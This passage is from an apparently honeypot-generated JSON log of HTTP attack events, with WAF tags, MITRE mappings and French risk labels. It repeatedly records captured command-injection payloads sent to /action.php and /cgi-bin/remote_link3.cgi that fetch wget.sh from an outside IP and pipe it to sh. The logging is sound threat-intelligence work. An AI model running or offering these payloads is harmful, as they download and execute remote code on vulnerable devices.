\u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022d27a31ac8dfb8dde9eac956b464e0fc4\u0022, \u0022path_pattern_hash\u0022: \u00223dbc30808e9f368b04f77623e2b863af\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60\u0022, \u0022query_string\u0022: \u0022host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.4\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60\u0022, \u0022query_string\u0022: \u0022host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\u0022, \u0022payload_snippet\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.4\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022e5b84594b8dddd311e36256b42187f4ffffd18be\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.4\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.4\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_suspicious_params\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_suspicious_params\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":278},{"id":11809708,"ip":"45.153.34.252","ts":"2026-07-14 02:29:57.000000","proto":"tcp","src_port":35740,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/remote_link3.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00229d3dc4a8fb25011a455876c70b2b86adbab83cd0\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 322, \u0022payload_entropy\u0022: 5.211010867910645, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022bf38ea8cef8d51c26c553a16765c473947b2c4c8\u0022, \u0022event_fingerprint\u0022: \u002294ac4cfc1654de2487fc907f56945264d17c479c\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022916cb6a33c8c5afbf8e51ac11e1ffe42\u0022, \u0022path_pattern_hash\u0022: \u0022d36ef7dbd432d8eb2261edf7e6706be8\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_link3.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 167\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s iodata;busybox wget http:\/\/91.92.40.118\/wget.\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_link3.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 167\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s iodata;busybox wget http:\/\/91.92.40.118\/wget.\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00223f7765b421ad63a58050e6bccc9c5a3fc4acacb8\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_link3.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_link3.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_link3.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_link3.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022], \u0022behavior_alert_count\u0022: 1, \u0022behavior_priority\u0022: 